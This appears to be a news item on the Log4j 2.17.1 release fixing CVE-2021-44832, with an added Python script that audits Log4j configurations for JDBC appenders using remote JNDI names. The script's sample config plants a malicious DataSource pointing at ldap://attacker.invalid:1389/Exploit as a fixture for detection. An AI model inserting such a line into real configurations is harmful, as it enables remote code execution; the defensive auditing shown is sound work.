Log4j 2.17.1 update fixes another vulnerability

Corrective releases of the Log4j library, 2.17.1, 2.3.2-rc1 and 2.12.4-rc1, have been published, fixing another vulnerability (CVE-2021-44832). The issue is reported to allow remote code execution (RCE), but it is rated moderate (CVSS score 6.6) and is mainly of theoretical interest, since exploitation requires special conditions: the attacker must be able to modify the Log4j configuration, i.e. must already have access to the attacked system together with the rights to change the value of the log4j2.configurationFile configuration parameter or to edit the existing files that hold the logging settings.

The attack comes down to defining, on the local system, a JDBC Appender configuration whose data source refers to an external JNDI URI; when that URI is looked up, a Java class is returned for execution. The fix in the new releases restricts JNDI data source names in the JDBC Appender to the java protocol. By default the JDBC Appender is not configured to handle protocols other than java, i.e. without changing the configuration the attack is impossible. In addition, the issue affects only the log4j-core JAR and does not affect applications that use the log4j-api JAR without log4j-core. ...
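As an added illustration (not code from the opennet.ru item or from the Log4j project), the following Python script audits a Log4j 2 XML configuration for the precondition described above: a JDBC appender whose DataSource refers to a JNDI name through a non-local scheme such as ldap:// or rmi://. The embedded configuration is constructed for the example; the appender names, the attacker.invalid host and the audit_config/jndi_scheme helpers are assumptions, and scheme-less relative names are treated as local, mirroring the java:-only restriction that the fixed releases apply.

```python
"""Audit a Log4j 2 XML configuration for the CVE-2021-44832 precondition:
a JDBC appender whose DataSource names a JNDI resource through a non-local
(non-java:) scheme such as ldap:// or rmi://."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample configuration (not taken from any real deployment):
# "DbLocal" uses a container-local java: name in the style of the Log4j
# manual, "DbEvil" is what an attacker with write access to the config
# could plant (attacker.invalid is a placeholder host).
SAMPLE_CONFIG = """<Configuration status="warn">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p %c - %m%n"/>
    </Console>
    <JDBC name="DbLocal" tableName="LOGGING.APPLICATION_LOG">
      <DataSource jndiName="java:/comp/env/jdbc/LoggingDataSource"/>
      <Column name="EVENT_DATE" isEventTimestamp="true"/>
      <Column name="MESSAGE" pattern="%message"/>
    </JDBC>
    <JDBC name="DbEvil" tableName="LOGGING.APPLICATION_LOG">
      <DataSource jndiName="ldap://attacker.invalid:1389/Exploit"/>
      <Column name="MESSAGE" pattern="%message"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info">
      <AppenderRef ref="Console"/>
      <AppenderRef ref="DbLocal"/>
      <AppenderRef ref="DbEvil"/>
    </Root>
  </Loggers>
</Configuration>
"""

# The fixed Log4j releases restrict JDBC DataSource JNDI names to the
# java protocol; anything else is what this audit flags.
ALLOWED_SCHEMES = {"java"}


def local_name(tag):
    """Strip an XML namespace prefix ('{uri}JDBC' -> 'JDBC')."""
    return tag.rsplit("}", 1)[-1]


def jndi_scheme(name):
    """Lower-case URI scheme of a JNDI name, or None for a relative name
    such as 'jdbc/LoggingDataSource' (assumption: a relative name resolves
    in the local InitialContext and is treated as local here)."""
    return urlsplit(name).scheme.lower() or None


def find_jdbc_datasources(root):
    """Yield (appender name, jndiName) for each JDBC appender that uses a
    DataSource connection source, in both the concise form (<JDBC>) and the
    strict form (<Appender type="JDBC"> with a type="DataSource" child)."""
    for el in root.iter():
        tag = local_name(el.tag)
        is_jdbc = tag == "JDBC" or (
            tag == "Appender" and el.get("type", "").upper() == "JDBC")
        if not is_jdbc:
            continue
        for child in el:
            is_ds = (local_name(child.tag) == "DataSource"
                     or child.get("type") == "DataSource")
            if is_ds and child.get("jndiName") is not None:
                yield el.get("name", "?"), child.get("jndiName")


def audit_config(xml_text):
    """Return a list of (appender, jndiName, reason) findings for every
    DataSource whose JNDI name is not confined to the local java: scheme.
    Names containing a ${...} lookup cannot be resolved statically and are
    reported for manual review rather than silently accepted."""
    findings = []
    for appender, jndi in find_jdbc_datasources(ET.fromstring(xml_text)):
        if "${" in jndi:
            findings.append((appender, jndi,
                             "jndiName uses a property lookup; resolve manually"))
            continue
        scheme = jndi_scheme(jndi)
        if scheme is not None and scheme not in ALLOWED_SCHEMES:
            findings.append((appender, jndi,
                             f"remote JNDI scheme '{scheme}' "
                             "(CVE-2021-44832 precondition)"))
    return findings


if __name__ == "__main__":
    for appender, jndi, reason in audit_config(SAMPLE_CONFIG):
        print(f"{appender}: {jndi}: {reason}")
```

Running the script reports only DbEvil. The check is static and complements, rather than replaces, upgrading log4j-core; note that because the vulnerability needs write access to the configuration in the first place, a finding like DbEvil in a production config means the attacker already has a foothold on the host and the incident is wider than the logging library.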

Source: opennet.ru
